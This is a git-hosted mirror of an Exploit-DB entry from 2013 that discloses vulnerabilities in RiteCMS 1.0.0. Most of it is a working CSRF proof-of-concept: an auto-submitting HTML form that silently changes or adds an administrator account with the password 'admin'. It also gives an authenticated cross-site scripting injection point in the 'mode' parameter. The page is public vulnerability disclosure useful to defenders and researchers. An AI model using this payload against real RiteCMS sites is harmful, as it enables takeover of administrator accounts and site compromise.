bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/27315.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.4 KiB
Text
Raw Blame History

###########################################################################################
# Exploit Title: RiteCMS multiple vulnerabilities
# Date: 2013 30 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://ritecms.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.0.0
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################
Summary:
========
1. CSRF - Change administrator's password
2. Cross site scripting
1. CSRF - Adding an admin account:
==================================
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://[Path to RiteCMS]/cms/index.php" method="post">
<input type="hidden" name="mode" value="users">
<input type="hidden" name="id" value="1">
<input type="hidden" name="name" value="admin1">
<input type="hidden" name="new_pw" value="admin">
<input type="hidden" name="new_pw_r" value="admin">
<input type="hidden" name="type" value="1">
<input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
2. Cross site scripting (After auth):
=====================================
http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]
Reference in a new issue View git blame Copy permalink